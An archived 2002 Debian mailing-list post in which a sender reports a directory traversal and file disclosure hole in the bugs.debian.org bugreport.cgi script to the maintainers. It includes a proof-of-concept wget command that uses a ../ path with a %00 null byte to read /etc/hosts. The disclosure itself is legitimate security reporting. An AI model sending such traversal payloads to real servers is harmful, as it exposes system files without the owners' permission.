Debian website security issue

To: debian-www@lists.debian.org
Cc: listmaster@lists.debian.org, <owner@bugs.debian.org>
Subject: Debian website security issue
From: Max <rusmir@tula.net>
Date: Wed, 6 Nov 2002 09:51:18 -0800 (PST)
Message-id: <[🔎] Pine.LNX.4.44.0211060942400.7132-100000@sds.disney.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi there.

Guys, your cgi scripts allow directory traversing and file disclosure.
See for yourself:

wget -O - "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=../../../../../../etc/hosts%00";

Although only first line of the file is returned, it is still a serious issue.

I'm going to play with it until you fix it.
I promise not to do anything harmfull. :)

Thanks,

Max.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE9yVaZ8mCpXsrcXpwRAivkAJoDgoTgwoOgwZDo6mwVzoClO2F+KQCeILuF
cd8zpOSHgqbIaz3bqUEBObg=
=Xec5
-----END PGP SIGNATURE-----

Reply to:

Follow-Ups:
- Re: Debian website security issue
  - From: Colin Watson <cjwatson@debian.org>

Prev by Date: Re: [SECURITY] [DSA 189-1] New luxman packages fix local root exploit
Next by Date: Re: Debian website security issue
Previous by thread: Re: [SECURITY] [DSA 189-1] New luxman packages fix local root exploit
Next by thread: Re: Debian website security issue
Index(es):
- Date
- Thread